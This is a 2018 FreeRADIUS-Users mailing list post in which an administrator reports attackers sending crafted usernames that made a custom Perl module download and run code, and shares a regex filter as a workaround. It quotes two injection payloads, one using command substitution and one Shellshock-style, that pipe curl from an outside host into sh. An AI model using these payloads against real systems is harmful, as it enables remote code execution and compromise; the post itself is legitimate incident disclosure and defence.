Remote code execution vulnerability via Perl module

David Herselman dhe at syrex.co
Tue Jul 3 13:44:07 CEST 2018


Hi,

We had upgraded our infrastructure to FreeRADIUS 2.2.10 due to us receiving a growing number of authentication requests, starting Fri Jun 29 00:48:59 (GMT), which result in FreeRADIUS downloading and executing code.

Transmitting the following username results in a custom perl module executing the code:
	$(/usr/bin/curl v.kernelupgr.com/d/all|sh)

We have observed another variant of this, which didn't appear to affect us:
	() { :;}; /usr/bin/curl v.kernelupgr.com/d/all|sh



We've been able to work around the problem by placing the following code near the beginning of our Perl module:
	if ($RAD_REQUEST{'User-Name'} !~ /^[[:alnum:]._-]+$/) { return RLM_MODULE_NOTFOUND; };


Any suggestions regarding possibly cleaning other attributes which may result in code execution on the following line?
	&radiusd::radlog(1, "RAD_REQUEST: $_ = $RAD_REQUEST{$_}");



Testing:
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u-s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
OK
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\\s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\(s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD


Regards
David Herselman



More information about the Freeradius-Users mailing list